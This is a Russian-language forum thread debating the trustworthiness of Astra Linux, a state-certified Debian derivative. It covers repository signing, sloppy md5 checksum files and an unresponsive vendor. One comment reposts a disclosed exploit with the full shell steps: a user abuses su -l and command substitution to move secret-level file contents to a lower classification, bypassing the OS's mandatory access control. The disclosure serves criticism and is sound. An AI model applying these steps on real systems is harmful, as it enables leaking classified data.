Русская защищенная ОС Astra Linux


Есть такая отечественная операционная система – Astra Linux: http://www.astra-linux.com
Насчет "отечетсвенности" сказано с некторой натяжкой, поскольку разработана на основе Debian.
Но зато имеет важное отличие – сертификат по безопасности от ФСБ, о котором сказано следующее:

"...На сегодняшний день «Astra Linux Special Edition» – это единственная в России операционная система, сертифицированная во всех трех системах сертификации средств защиты информации (ФСБ, Минобороны, ФСТЭК), позволяющая обрабатывать информацию ограниченного доступа, включая сведения, составляющие государственную тайну до степени секретности “совершенно секретно” включительно".

Разрешение на допуск к разработке совершенно секретных данных – это, конечно, круто, если не ошибаюсь – круче, чем NT.
Для русского патриота, которого коробит даже от мысли о возможном сливе информации в АНБ через вражеские ОСи, Astra Linux может оказаться настоящей находкой.

Но что скажут об этой ОС обитатели pgpru.com? Может, у кого-то уже есть опыт ее использования, отзывы, как насчет совместимости с репозитариями от Debian и допустимы ли они без потери достигнутой безопасности?
Потому что по описанию на сайте Astra выглядит кучеряво, а вот как оно на самом деле...


PS. Есть еще ОС "РОСА", но по отзывам, специалисты ее почему-то не очень жалуют.

Комментарии
— unknown (26/03/2014 16:49)   

По идее, недопустимы. Там должны стоять ссылки на свои репозитарии, которые переподписаны своими ключами. Всякое обновление от Debian должно попадать туда, перепроверяться, перекомпилироваться и переподписываться. Иначе вы потеряете сертифицированность продукта.

По-крайней мере, так должно быть, иначе сертификация не имеет смысла.
Гость (26/03/2014 17:24)   
Индусская, корейская, хоть французкая.

Если линукс – база. Основной язык дистрибутива обязан быть английским.

Холодная война проиграна.

Иначе у него горстка последователей будет, и пользователей тоже.

Батька Путин может пролабировать, всем коррумпированным чиновникам застряпать лаптопы с ней, слегка толкнуть в пропасть, так сказать.
— unknown (26/03/2014 17:45)   

У сертифицированных ОС в любой стране будет горстка последователей. Для использования в плане личной безопасности государственная сертификация не нужна. Скорее даже наоборот.

И наоборот, для госучреждений нужно формальное заверение безопасности. Они не могут доверять только открытому сообществу разработчиков.


Это тут ни причём. Если что-то происходит в какой-то конкретной стране, не надо приписывать все местные реалии до кучи.
Гость (26/03/2014 20:31)   
unknown, спасибо, у вас, как всегда – трезвый взвешенный ответ :)
В отличие от некоторых "навальных".
Добавлю, что "Astra Linux Special Edition" скачать даже для тестирования нельзя, стоит она 20000 руб. и продается только организациям, что на мой взгляд весьма глупо, т.к. снижает массовость.
А " Astra Linux Common Edition" можно свободно скачать и использовать, но md5 имеет позорный косяк – сами полюбуйтесь:


Конечно, это легко правится в пять секунд, но говорит наплевательском отношении производителся к своему продукту, т.к. все проблемы начинаются с мелочей.

Скорее даже наоборот

А любопытно – почему?
— unknown (26/03/2014 20:56)   
Потому что наехать на сообщество свободных разработчиков с целью выдать ключ, вставлять трояны в персонифицированных атаках и пр. — можно, но сложно, если их много, они мотивированы идеями свободного ПО; рассредоточены, но связаны отношениями подтверждаемого доверия.

А разработчики сертифицированного ПО — да вот же они, сидят в одном офисе фирмы-контрактора в кучке кабинетов, вот их допуски-подписки, вот их начальство; вот их зарплата, которая идёт от контракта на продажи продукта госструктурам. Они люди подневольные. В крайнем случае могут повторить подвиг Сноудена, но это же маловероятно.
Гость (26/03/2014 21:10)   
Т.е. в этом смысле RedHat должен вызывать менее доверия, чм Debian?
Гость (26/03/2014 21:10)   
в смысле RHEL
Гость (27/03/2014 05:27)   

/comment16828[link1]. Не найду точную цитату, но здесь уже обсуждалось: при компрометации RedHat'овских серверов публичного репорта от компании не было, все детали скрыты. Признали, что был взлом, но как, кто, что, из-за чего, почему — всё молчок. В Debian не так, и это вселяет больше доверия. И ещё: /Форум/UnixLike/DebianVFedora[link2]. Fedora — RH-based.
Гость (27/03/2014 05:32)   
Я, может, скажу ересь, но в других дистрах (которые не Debian-based) вообще подписи на пакетах есть, или там как в BSD, одни хэши, которые распространяются с севера, авторизованного по ssh-ключу?
— unknown (27/03/2014 09:42)   
В RH-based есть, причём полная поддержка появилась раньше Debian.
Гость (27/03/2014 15:07)   
В Slackware есть.
Гость (31/03/2014 13:15, исправлен 31/03/2014 13:40)   

Рекомендуемое оборудование[link3]. Надо ли это понимать так, что эти компании "наши", в том смысле что на их обоудовании нет враждебных аппаратно-программных жучков? Всё таки гостайна до "совершенно секретно" как-никак...

— unknown (31/03/2014 13:43)   
На оборудование может требоваться отдельная сертификация. Возможно, на оборудовании из списка она уже стандартно отработана.

Или просто какое-то предпочитаемое оборудование работает для системы из-коробки, без особых настроек, без необходимости использовать какие-то закрытые драйвера.
Гость (20/04/2014 00:33)   
Из жизни криворуких кодеров:

Критическая уязвимость в Astra Linux

Jun. 28th, 2013 at 11:38 AM


Есть такой дистрибутив линукса Astra Linux Special Edition, который сертифицирован МО РФ, ФСТЕК.
И который создается в лучших традициях линуксоидов, виндовых программистов решивших писать под линукс, как под виндовс, ну и специфических реалиях российской оборонки. Понятно что из этого всего что-то нормальное не могло получится.
В итоге сделали кучу костылей, вместо того, чтобы доделать уже существующие и надежно работающие решения.
В итоге был найден эксплойт для получения доступа к данным различного уровня доступа.

Под катом репост оригинала:

Описание уязвимости

Критическая уязвимость в Astra Linux позволяет пользователю изменять категории мандатного доступа, понижая степень секретности и класс для сведений.
Одной из причин описанной проблемы является закрытость проекта и построение велосипедов вместо использования значительно более проверенных и протестированных решений, таких, как SELinux.
Для мандатного контроля доступа в Astra Linux используются следующие компоненты: модуль ядра parsecfs, реализующий монтирование файловых систем, видимых пользователям с одинаковым уровнем доступа, аудит действий пользователя и мандатный контроль доступа, юзерспейсный сервис для настройки ядерной части и модули PAM для аутентификации и авторизации пользователей.
Идеологически модель, используемая в Astra Linux напоминает модель модель Белла-Лападулы, реализованную в Multi-level security политике SELinux, но имеет одно отличие: пользователю разрешено выбирать при входе в систему, с каким классом и уровнем сведений он желает работать.
При обычной работе пользователь даже не видит документы, имеющие другой класс, так как содержимое его домашнего каталога фактически “монтируется” заново при каждом входе в систему.
При этом, пользователю по умолчанию разрешено выполнять команду su, причём эта команда, помимо ID пользователя, изменяет и его мандатную метку, а опция -l “перемонтирует” и его домашний каталог.

Эксплоит

1) Создаём юзера, указав ему минимальный уровень доступа 0, а максимальный 1:
level2:0:0:1:0
2) Логинимся от секретного пользователя.

Astra Linux SE 1.3 (smolensk)
tty1
astra login: level2
Secret level [1]: 1

3) Создаём файл с секретными данными

level2@astra$ echo “secret message” >test.txt

4) Повышаем привиллегии, открываем файл на чтение в старой сессии и скармливаем в новую
level2@astra$ su -l level2 -c “echo `cat test1.txt` > secret.txt”

5) Проверяем результат, заходим с другим уровнем доступа:
Astra Linux SE 1.3 (smolensk)
tty1
astra login: level2
Secret level [1]: 0

level2@astra$ cat secret.txt
secret message

Аналогичным образом возможен перенос документов между категориями и различными пользователями. Резюмируя вышесказанное, критическая уязвимость в Astra Linux несёт серьёзную угрозу безопасности органов государственной власти.

http://werwolf-lg.livejournal.com/230582.html
Гость (19/05/2014 03:15)   
Получил ответ от представителей ASTRA:

Здравствуйте, участник ppgpru.com!

Просим Вас сообщить какую организацию Вы представляете? Мы готовы
предоставить Вам операционную систему Astra Linux Special Edition,
с комплектом эксплуатационной документации, стандартным способом
по официальному письму-запросу.


Для получения более подробной информации просим Вас обращаться по
телефону, указанному ниже.

С уважением,
Служба сопровождения ОАО "НПО РусБИТех"

тел. +7 (495) 648-15-30

e-mail:
support@.....

(email затер от спамботов, но если кому нужно, могу выслать почтой.

Так найдутся у нас смельчаки, желающие потестить Special Edition?
(на себя принять не могу, поскольку частное лицо).
Гость (19/05/2014 07:08)   

И там быдляк! Какого хера пошла эта мода ставить знак вопроса в конце повествовательного преложения?
Гость (19/05/2014 21:09)   
А если так (с двоеточием)
Гость (14/12/2014 06:27)   

Речь, по-моему, об этом[link5].
Гость (23/02/2015 00:42)   
Так что там, кто щупал эту шедевру в реале? Стоит ли ее юзать, или лучше оставаться на Дебе, от которого она произошла?
Гость (23/02/2015 02:41)   

лучше оставаться на Дебе, от которого она произошла
Гость (24/02/2015 00:08)   

То есть выходит, что вы ее щупали. И какие же недостатки Астры привели вас к такому безрадостному выводу?
Гость (24/02/2015 15:23)   
Да не щупал он, просто высер от балды и все.
Гость (24/02/2015 18:42)   

Не знаю, что имел ввиду Гость (23/02/2015 02:41), но у меня лично предвзятое отношение к "отечественно-пророссийским" проектам(
И вообще, зачем нужна какая-то сборка, когда есть проверенные дистрибутивы (в т.ч. Дебиан)
Гость (24/02/2015 18:56)   
А чего её щупать, когда написано прямым текстом

имеет важное отличие – сертификат по безопасности от ФСБ

Можно сразу крест ставить на этой "русской" ОС, хорошо что проговорились.


чтобы пилить бабло, впаривать лохам трояны и визжать о патриотизме
Гость (24/02/2015 22:22)   
Но с другой стороны, если обзавестись этими сертификатами, а безопасность ОС не оправдает "оказанного високого доверия", то этим разрабам могут неслабо настучать по ушам. Та же ФСБ, видимо, заказчик.

Пытаюсь понять: яляется ли страх перед такой расправой достаточным сдерживающим фактором, чтобы не гнать вместо высокозащищенной систему откровенную тутфту?

И прихожу к выводу: нет, не является. Потому что этих разрабов в прошлом году уже один раз ткнули носом в позорный косяк по md5, описанный на https://www.pgpru.com/forum/un.....s=1&p=1#Comment77871[link6]
они его потом поправили. А сейчас захожу на сайт, скачиваю orel-1.10-01.12.2014_14.16.md5 – и здрасьте, снова те же яйца!

Косяк, конечно, не смертельный, но позорный, и указывает, что в ейной конторе полный бардак и полное отсутствие ОТК. Я уж не говорю о "о былом[link7]".

И это система, которая позиционируется на обработку грифа "гостайна"!

Так и представляется, что штат этой констры состоит из "смотрящего" – тов. майора, и "исполнителя" – лопоухого студента, выгнанного со второго курса за пьянство и регулярные пропуски занятий, который переписывает дебиановские стринги на астровские и не имеет малейшего порядка о документировании проектов и ответственности.

Тов. Дзержинский за подобные "косяки" сразу бы поставил обоих к стенке.
Гость (25/02/2015 18:43)   
Подтверждаю: в этой конторе действительно бардак.
Потому что отправил им вчера информационное письмо с просьбой обратить внимание на эту нашу дискуссию.
И что? А ничего – до сих пор ни привета ни ответа.

В любой самой захудалой конторе на рецепшн сидит девочка, отвечающая на звонки и мыло.
Гость (04/03/2015 16:15)   
Зачем вам Astra Linux? Ведь более безопасен FREEBSD, а если так тянет на русское,
то присмотритесь к ALT Linux, сертефецированный ФЭСТк.
Гость (05/03/2015 02:05)   

У них там сидит мальчик. Ему по уставу велено на звонки не отвечать, мыло не поднимать.
Гость (06/03/2015 21:37)   

Потому что это не Линукс. И кто вам сказал, что Фря безопаснее?
Про Альт вообще лучше не вспоминать..
Гость (10/03/2015 16:55)   
Потому что это не Линукс. И кто вам сказал, что Фря безопаснее?
Про Альт вообще лучше не вспоминать..


Фря безопаснее потому, что это юникс подобная система,
и вообще на фрях только и ставят серьезную защиту к примеру в сети.

А про альт линукс вы зря, в отличии от разработчиков астра линукса,
которые зажимают его исходный код, альт линукс полностью открыт,
а значит в априорее безопаснее астралинукса
— unknown (10/03/2015 17:12)   

А как измерить индекс юникс-подобности?
Гость (10/03/2015 17:55)   
У GNU/Linux он же нулевой: GNU = GNU not UNIX.
Гость (11/03/2015 18:55)   
в отличии от разработчиков астра линукса,
которые зажимают его исходный ко

Разве астра-разработчики скрывают свой код?
— собака (12/03/2015 20:09)   
И код зажимают, и на вопросы не отвечают – все признаки того, что контора не хочет светить свои промахи и тихо умирает. Или уже умерла.
Пора бы уже СК разобраться, за что им государство бабло заплатило, а ФСБ сертифкат выдало.

Ссылки
[link1] https://www.pgpru.com/comment16828

[link2] https://www.pgpru.com/forum/unixlike/debianvfedora

[link3] http://www.astra-linux.com/index.php?option=com_content&view=section&id=12&Itemid=93

[link4] https://www.pgpru.com/comment77878

[link5] http://linux.slashdot.org/story/08/08/22/1341247/red-hat-fedora-servers-compromised

[link6] https://www.pgpru.com/forum/unixlike/russkajaosastralinux?show_comments=1&p=1#Comment77871

[link7] https://www.pgpru.com/forum/unixlike/russkajaosastralinux?show_comments=1&p=1#Comment78731